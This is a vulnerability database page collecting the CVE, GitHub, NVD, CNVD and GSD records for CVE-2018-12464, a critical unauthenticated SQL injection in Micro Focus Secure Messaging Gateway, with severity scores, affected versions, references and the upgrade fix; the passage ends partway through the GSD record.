cvelistv5 - CVE-2018-12464

CVE-2018-12464 (GCVE-0-2018-12464)

Vulnerability from cvelistv5

Published

2018-06-29 16:00

Modified

2024-09-17 01:55

Severity ?

10.0 (Critical) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-89 - Unauthenticated SQL injection ()

Summary

References

▼	URL	Tags
	security@opentext.com	https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/
	security@opentext.com	https://support.microfocus.com/kb/doc.php?id=7023132
	security@opentext.com	https://www.exploit-db.com/exploits/45083/
	af854a3a-2127-422b-91ae-364da2661108	https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/
	af854a3a-2127-422b-91ae-364da2661108	https://support.microfocus.com/kb/doc.php?id=7023132
	af854a3a-2127-422b-91ae-364da2661108	https://www.exploit-db.com/exploits/45083/

Impacted products

	Vendor	Product	Version
	Micro Focus	Secure Messaging Gateway	Version: unspecified < 471

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T08:38:05.924Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "45083",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "https://www.exploit-db.com/exploits/45083/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://support.microfocus.com/kb/doc.php?id=7023132"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Secure Messaging Gateway",
          "vendor": "Micro Focus",
          "versions": [
            {
              "lessThan": "471",
              "status": "affected",
              "version": "unspecified",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Mehmet INCE from PRODAFT"
        }
      ],
      "datePublic": "2018-06-28T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A SQL injection vulnerability in the web administration and quarantine components of Micro Focus Secure Messaging Gateway allows an unauthenticated remote attacker to execute arbitrary SQL statements against the database. This can be exploited to create an administrative account and used in conjunction with CVE-2018-12465 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that use the GWAVA product name (i.e. GWAVA 6.5)."
        }
      ],
      "metrics": [
        {
          "cvssV3_0": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 10,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-89",
              "description": "Unauthenticated SQL injection (CWE-89)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-01-06T16:15:24",
        "orgId": "f81092c5-7f14-476d-80dc-24857f90be84",
        "shortName": "microfocus"
      },
      "references": [
        {
          "name": "45083",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "https://www.exploit-db.com/exploits/45083/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://support.microfocus.com/kb/doc.php?id=7023132"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "value": "Please upgrade to Secure Messaging Gateway 471 or newer using the online update tool in the Secure Messaging Gateway management console."
        }
      ],
      "source": {
        "defect": [
          "GWAV-2258"
        ],
        "discovery": "EXTERNAL"
      },
      "title": "Unauthenticated SQL injection in Micro Focus Secure Messaging Gateway",
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security@microfocus.com",
          "DATE_PUBLIC": "2018-06-28T16:00:00.000Z",
          "ID": "CVE-2018-12464",
          "STATE": "PUBLIC",
          "TITLE": "Unauthenticated SQL injection in Micro Focus Secure Messaging Gateway"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Secure Messaging Gateway",
                      "version": {
                        "version_data": [
                          {
                            "affected": "\u003c",
                            "version_affected": "\u003c",
                            "version_value": "471"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Micro Focus"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "Mehmet INCE from PRODAFT"
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A SQL injection vulnerability in the web administration and quarantine components of Micro Focus Secure Messaging Gateway allows an unauthenticated remote attacker to execute arbitrary SQL statements against the database. This can be exploited to create an administrative account and used in conjunction with CVE-2018-12465 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that use the GWAVA product name (i.e. GWAVA 6.5)."
            }
          ]
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 10,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.0"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "Unauthenticated SQL injection (CWE-89)"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "45083",
              "refsource": "EXPLOIT-DB",
              "url": "https://www.exploit-db.com/exploits/45083/"
            },
            {
              "name": "https://support.microfocus.com/kb/doc.php?id=7023132",
              "refsource": "CONFIRM",
              "url": "https://support.microfocus.com/kb/doc.php?id=7023132"
            },
            {
              "name": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/",
              "refsource": "CONFIRM",
              "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/"
            }
          ]
        },
        "solution": [
          {
            "lang": "en",
            "value": "Please upgrade to Secure Messaging Gateway 471 or newer using the online update tool in the Secure Messaging Gateway management console."
          }
        ],
        "source": {
          "defect": [
            "GWAV-2258"
          ],
          "discovery": "EXTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "f81092c5-7f14-476d-80dc-24857f90be84",
    "assignerShortName": "microfocus",
    "cveId": "CVE-2018-12464",
    "datePublished": "2018-06-29T16:00:00Z",
    "dateReserved": "2018-06-15T00:00:00",
    "dateUpdated": "2024-09-17T01:55:32.229Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2018-12464\",\"sourceIdentifier\":\"security@opentext.com\",\"published\":\"2018-06-29T16:29:00.277\",\"lastModified\":\"2024-11-21T03:45:16.117\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"A SQL injection vulnerability in the web administration and quarantine components of Micro Focus Secure Messaging Gateway allows an unauthenticated remote attacker to execute arbitrary SQL statements against the database. This can be exploited to create an administrative account and used in conjunction with CVE-2018-12465 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that use the GWAVA product name (i.e. GWAVA 6.5).\"},{\"lang\":\"es\",\"value\":\"Una vulnerabilidad de inyecci\u00f3n SQL en los componentes de cuarentena y administraci\u00f3n web de Micro Focus Secure Messaging Gateway permite que un atacante remoto no autenticado ejecute declaraciones SQL arbitrarias contra la base de datos. Esto se puede explotar para crear una cuenta administrativa y usarla junto con CVE-2018-12465 para conseguir ejecutar c\u00f3digo de manera remota. Esto afecta a las versiones anteriores a la 471 de Micro Focus Secure Messaging Gateway. No afecta a las versiones anteriores del producto que utilicen el nombre de producto GWAVA (por ejemplo, GWAVA 6.5.).\"}],\"metrics\":{\"cvssMetricV30\":[{\"source\":\"security@opentext.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.0\",\"vectorString\":\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\",\"baseScore\":10.0,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":6.0},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.0\",\"vectorString\":\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:N/C:P/I:P/A:P\",\"baseScore\":7.5,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"PARTIAL\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"PARTIAL\"},\"baseSeverity\":\"HIGH\",\"exploitabilityScore\":10.0,\"impactScore\":6.4,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"security@opentext.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-89\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-89\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:microfocus:secure_messaging_gateway:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"471\",\"matchCriteriaId\":\"7549F67C-4E9D-4801-B4CE-E006F25CE090\"}]}]}],\"references\":[{\"url\":\"https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/\",\"source\":\"security@opentext.com\"},{\"url\":\"https://support.microfocus.com/kb/doc.php?id=7023132\",\"source\":\"security@opentext.com\"},{\"url\":\"https://www.exploit-db.com/exploits/45083/\",\"source\":\"security@opentext.com\"},{\"url\":\"https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://support.microfocus.com/kb/doc.php?id=7023132\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://www.exploit-db.com/exploits/45083/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"}]}}"
  }
}

ghsa-qx98-cwxc-vrv6

Vulnerability from github

Published

2022-05-13 01:34

Modified

2022-05-13 01:34

Severity ?

9.8 (Critical) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Details

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2018-12464"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-89"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-06-29T16:29:00Z",
    "severity": "CRITICAL"
  },
  "details": "A SQL injection vulnerability in the web administration and quarantine components of Micro Focus Secure Messaging Gateway allows an unauthenticated remote attacker to execute arbitrary SQL statements against the database. This can be exploited to create an administrative account and used in conjunction with CVE-2018-12465 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that use the GWAVA product name (i.e. GWAVA 6.5).",
  "id": "GHSA-qx98-cwxc-vrv6",
  "modified": "2022-05-13T01:34:47Z",
  "published": "2022-05-13T01:34:47Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-12464"
    },
    {
      "type": "WEB",
      "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway"
    },
    {
      "type": "WEB",
      "url": "https://support.microfocus.com/kb/doc.php?id=7023132"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/45083"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

fkie_cve-2018-12464

Vulnerability from fkie_nvd

Published

2018-06-29 16:29

Modified

2024-11-21 03:45

Severity ?

10.0 (Critical) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
9.8 (Critical) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

References

▼	URL	Tags
	security@opentext.com	https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/
	security@opentext.com	https://support.microfocus.com/kb/doc.php?id=7023132
	security@opentext.com	https://www.exploit-db.com/exploits/45083/
	af854a3a-2127-422b-91ae-364da2661108	https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/
	af854a3a-2127-422b-91ae-364da2661108	https://support.microfocus.com/kb/doc.php?id=7023132
	af854a3a-2127-422b-91ae-364da2661108	https://www.exploit-db.com/exploits/45083/

Impacted products

	Vendor	Product	Version
	microfocus	secure_messaging_gateway	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:microfocus:secure_messaging_gateway:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "7549F67C-4E9D-4801-B4CE-E006F25CE090",
              "versionEndExcluding": "471",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A SQL injection vulnerability in the web administration and quarantine components of Micro Focus Secure Messaging Gateway allows an unauthenticated remote attacker to execute arbitrary SQL statements against the database. This can be exploited to create an administrative account and used in conjunction with CVE-2018-12465 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that use the GWAVA product name (i.e. GWAVA 6.5)."
    },
    {
      "lang": "es",
      "value": "Una vulnerabilidad de inyecci\u00f3n SQL en los componentes de cuarentena y administraci\u00f3n web de Micro Focus Secure Messaging Gateway permite que un atacante remoto no autenticado ejecute declaraciones SQL arbitrarias contra la base de datos. Esto se puede explotar para crear una cuenta administrativa y usarla junto con CVE-2018-12465 para conseguir ejecutar c\u00f3digo de manera remota. Esto afecta a las versiones anteriores a la 471 de Micro Focus Secure Messaging Gateway. No afecta a las versiones anteriores del producto que utilicen el nombre de producto GWAVA (por ejemplo, GWAVA 6.5.)."
    }
  ],
  "id": "CVE-2018-12464",
  "lastModified": "2024-11-21T03:45:16.117",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 10.0,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 6.0,
        "source": "security@opentext.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2018-06-29T16:29:00.277",
  "references": [
    {
      "source": "security@opentext.com",
      "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/"
    },
    {
      "source": "security@opentext.com",
      "url": "https://support.microfocus.com/kb/doc.php?id=7023132"
    },
    {
      "source": "security@opentext.com",
      "url": "https://www.exploit-db.com/exploits/45083/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://support.microfocus.com/kb/doc.php?id=7023132"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://www.exploit-db.com/exploits/45083/"
    }
  ],
  "sourceIdentifier": "security@opentext.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-89"
        }
      ],
      "source": "security@opentext.com",
      "type": "Secondary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-89"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

cnvd-2018-12540

Vulnerability from cnvd

Title: Micro Focus Secure Messaging Gateway Web administration和quarantine组件SQL注入漏洞

Description:

Micro Focus Secure Messaging Gateway（SMG）是英国Micro Focus公司的一套企业网络和消息系统出、入站保护软件。该产品包括病毒防护、反垃圾邮件、防DDos攻击和图像分析等功能。Web administration是其中的一个基于Web的管理组件；quarantine是其中的一个文件隔离组件。

Micro Focus SMG 471之前版本中的Web administration和quarantine组件存在SQL注入漏洞。远程攻击者可利用该漏洞执行任意的SQL语句并创建管理账户。

Severity: 高

Patch Name: Micro Focus Secure Messaging Gateway Web administration和quarantine组件SQL注入漏洞的补丁

Patch Description:

Micro Focus SMG 471之前版本中的Web administration和quarantine组件存在SQL注入漏洞。远程攻击者可利用该漏洞执行任意的SQL语句并创建管理账户。目前，供应商发布了安全公告及相关补丁信息，修复了此漏洞。

Formal description:

目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://support.microfocus.com/kb/doc.php?id=7023132

Reference: https://support.microfocus.com/kb/doc.php?id=7023132

Impacted products

Name
Micro Focus Secure Messaging Gateway <471

Show details on source website

JSON

To clipboard

{
  "cves": {
    "cve": {
      "cveNumber": "CVE-2018-12464"
    }
  },
  "description": "Micro Focus Secure Messaging Gateway\uff08SMG\uff09\u662f\u82f1\u56fdMicro Focus\u516c\u53f8\u7684\u4e00\u5957\u4f01\u4e1a\u7f51\u7edc\u548c\u6d88\u606f\u7cfb\u7edf\u51fa\u3001\u5165\u7ad9\u4fdd\u62a4\u8f6f\u4ef6\u3002\u8be5\u4ea7\u54c1\u5305\u62ec\u75c5\u6bd2\u9632\u62a4\u3001\u53cd\u5783\u573e\u90ae\u4ef6\u3001\u9632DDos\u653b\u51fb\u548c\u56fe\u50cf\u5206\u6790\u7b49\u529f\u80fd\u3002Web administration\u662f\u5176\u4e2d\u7684\u4e00\u4e2a\u57fa\u4e8eWeb\u7684\u7ba1\u7406\u7ec4\u4ef6\uff1bquarantine\u662f\u5176\u4e2d\u7684\u4e00\u4e2a\u6587\u4ef6\u9694\u79bb\u7ec4\u4ef6\u3002\r\n\r\nMicro Focus SMG 471\u4e4b\u524d\u7248\u672c\u4e2d\u7684Web administration\u548cquarantine\u7ec4\u4ef6\u5b58\u5728SQL\u6ce8\u5165\u6f0f\u6d1e\u3002\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u6267\u884c\u4efb\u610f\u7684SQL\u8bed\u53e5\u5e76\u521b\u5efa\u7ba1\u7406\u8d26\u6237\u3002",
  "discovererName": "unknown",
  "formalWay": "\u76ee\u524d\u5382\u5546\u5df2\u53d1\u5e03\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u6f0f\u6d1e\uff0c\u8865\u4e01\u83b7\u53d6\u94fe\u63a5\uff1a\r\nhttps://support.microfocus.com/kb/doc.php?id=7023132",
  "isEvent": "\u901a\u7528\u8f6f\u786c\u4ef6\u6f0f\u6d1e",
  "number": "CNVD-2018-12540",
  "openTime": "2018-07-04",
  "patchDescription": "Micro Focus Secure Messaging Gateway\uff08SMG\uff09\u662f\u82f1\u56fdMicro Focus\u516c\u53f8\u7684\u4e00\u5957\u4f01\u4e1a\u7f51\u7edc\u548c\u6d88\u606f\u7cfb\u7edf\u51fa\u3001\u5165\u7ad9\u4fdd\u62a4\u8f6f\u4ef6\u3002\u8be5\u4ea7\u54c1\u5305\u62ec\u75c5\u6bd2\u9632\u62a4\u3001\u53cd\u5783\u573e\u90ae\u4ef6\u3001\u9632DDos\u653b\u51fb\u548c\u56fe\u50cf\u5206\u6790\u7b49\u529f\u80fd\u3002Web administration\u662f\u5176\u4e2d\u7684\u4e00\u4e2a\u57fa\u4e8eWeb\u7684\u7ba1\u7406\u7ec4\u4ef6\uff1bquarantine\u662f\u5176\u4e2d\u7684\u4e00\u4e2a\u6587\u4ef6\u9694\u79bb\u7ec4\u4ef6\u3002\r\n\r\nMicro Focus SMG 471\u4e4b\u524d\u7248\u672c\u4e2d\u7684Web administration\u548cquarantine\u7ec4\u4ef6\u5b58\u5728SQL\u6ce8\u5165\u6f0f\u6d1e\u3002\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u6267\u884c\u4efb\u610f\u7684SQL\u8bed\u53e5\u5e76\u521b\u5efa\u7ba1\u7406\u8d26\u6237\u3002 \u76ee\u524d\uff0c\u4f9b\u5e94\u5546\u53d1\u5e03\u4e86\u5b89\u5168\u516c\u544a\u53ca\u76f8\u5173\u8865\u4e01\u4fe1\u606f\uff0c\u4fee\u590d\u4e86\u6b64\u6f0f\u6d1e\u3002",
  "patchName": "Micro Focus Secure Messaging Gateway Web administration\u548cquarantine\u7ec4\u4ef6SQL\u6ce8\u5165\u6f0f\u6d1e\u7684\u8865\u4e01",
  "products": {
    "product": "Micro Focus Secure Messaging Gateway \u003c471"
  },
  "referenceLink": "https://support.microfocus.com/kb/doc.php?id=7023132",
  "serverity": "\u9ad8",
  "submitTime": "2018-07-02",
  "title": "Micro Focus Secure Messaging Gateway Web administration\u548cquarantine\u7ec4\u4ef6SQL\u6ce8\u5165\u6f0f\u6d1e"
}

gsd-2018-12464

Vulnerability from gsd

Modified

2023-12-13 01:22

Details

Aliases

CVE-2018-12464

Aliases

CVE-2018-12464

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2018-12464",
    "description": "A SQL injection vulnerability in the web administration and quarantine components of Micro Focus Secure Messaging Gateway allows an unauthenticated remote attacker to execute arbitrary SQL statements against the database. This can be exploited to create an administrative account and used in conjunction with CVE-2018-12465 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that use the GWAVA product name (i.e. GWAVA 6.5).",
    "id": "GSD-2018-12464",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2018-12464"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2018-12464"
      ],
      "details": "A SQL injection vulnerability in the web administration and quarantine components of Micro Focus Secure Messaging Gateway allows an unauthenticated remote attacker to execute arbitrary SQL statements against the database. This can be exploited to create an administrative account and used in conjunction with CVE-2018-12465 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that use the GWAVA product name (i.e. GWAVA 6.5).",
      "id": "GSD-2018-12464",
      "modified": "2023-12-13T01:22:30.220059Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "security@microfocus.com",
        "DATE_PUBLIC": "2018-06-28T16:00:00.000Z",
        "ID": "CVE-2018-12464",
        "STATE": "PUBLIC",
        "TITLE": "Unauthenticated SQL injection in Micro Focus Secure Messaging Gateway"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "Secure Messaging Gateway",
                    "version": {
                      "version_data": [
                        {
                          "affected": "\u003c",
                          "version_value": "471 "
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "Micro Focus"
            }
          ]
        }
      },
      "credit": [
        {
          "lang": "eng",
          "value": "Mehmet INCE from PRODAFT"
        }
      ],
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "A SQL injection vulnerability in the web administration and quarantine components of Micro Focus Secure Messaging Gateway allows an unauthenticated remote attacker to execute arbitrary SQL statements against the database. This can be exploited to create an administrative account and used in conjunction with CVE-2018-12465 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that use the GWAVA product name (i.e. GWAVA 6.5)."
          }
        ]
      },
      "impact": {
        "cvss": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 10,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
          "version": "3.0"
        }
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "Unauthenticated SQL injection (CWE-89)"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "45083",
            "refsource": "EXPLOIT-DB",
            "url": "https://www.exploit-db.com/exploits/45083/"
          },
          {
            "name": "https://support.microfocus.com/kb/doc.php?id=7023132",
            "refsource": "CONFIRM",
            "url": "https://support.microfocus.com/kb/doc.php?id=7023132"
          },
          {
            "name": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/",
            "refsource": "CONFIRM",
            "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/"
          }
        ]
      },
      "solution": [
        {
          "lang": "eng",
          "value": "Please upgrade to Secure Messaging Gateway 471 or newer using the online update tool in the Secure Messaging Gateway management console."
        }
      ],
      "source": {
        "defect": [
          "GWAV-2258"
        ],
        "discovery": "EXTERNAL"
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:microfocus:secure_messaging_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "471",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "security@suse.com",
          "ID": "CVE-2018-12464"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
